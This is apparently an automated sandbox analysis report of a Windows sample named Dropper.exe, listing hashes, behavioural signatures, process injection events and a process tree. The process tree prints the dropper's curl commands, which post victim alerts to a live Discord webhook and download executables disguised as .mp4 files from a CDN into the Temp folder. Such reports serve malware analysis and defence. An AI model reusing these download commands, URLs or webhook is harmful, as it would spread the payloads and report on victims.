Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 08:24
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240508-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
Dropper.exe
Resource
win10v2004-20240226-en
25 signatures
150 seconds
General
-
Target
Dropper.exe
-
Size
12KB
-
MD5
b11d9f89c1129428957175b7c55e8637
-
SHA1
6a1530364e3bf3c13a6500bdd313e1d8d4294301
-
SHA256
b390f949531dac7a42bee35fc98e1b9890361b2be5fa3efcc8cae8263174244f
-
SHA512
e368f3db1c511c6cfbb95f04c98e9df7fcda718f3f9c56dd34f5e9595eda9d072dc4af351a7ea7a2cea6f65117f7e2dd98fc97d6d6631673fdcdf939abe963ba
-
SSDEEP
384:fHPFcbjfi27q9bJnz6PbQGw+pfolwmfhhDj4VCsL:3yfiD9bJMbKwkhhD0wsL
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
Dropper.exeDropper.exedescription pid process target process PID 1708 wrote to memory of 2344 1708 Dropper.exe Dropper.exe PID 1708 wrote to memory of 2344 1708 Dropper.exe Dropper.exe PID 1708 wrote to memory of 2344 1708 Dropper.exe Dropper.exe PID 1708 wrote to memory of 2344 1708 Dropper.exe Dropper.exe PID 2344 wrote to memory of 2612 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2612 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2612 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2612 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2660 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2660 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2660 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2660 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2716 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2716 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2716 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2716 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2744 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2744 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2744 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2744 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2676 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2676 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2676 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2676 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2624 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2624 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2624 2344 Dropper.exe cmd.exe PID 2344 wrote to memory of 2624 2344 Dropper.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1708-0-0x000000007491E000-0x000000007491F000-memory.dmpFilesize
4KB
-
memory/1708-1-0x0000000001060000-0x000000000106A000-memory.dmpFilesize
40KB
-
memory/2344-2-0x0000000074890000-0x0000000074F7E000-memory.dmpFilesize
6.9MB
-
memory/2344-3-0x0000000074890000-0x0000000074F7E000-memory.dmpFilesize
6.9MB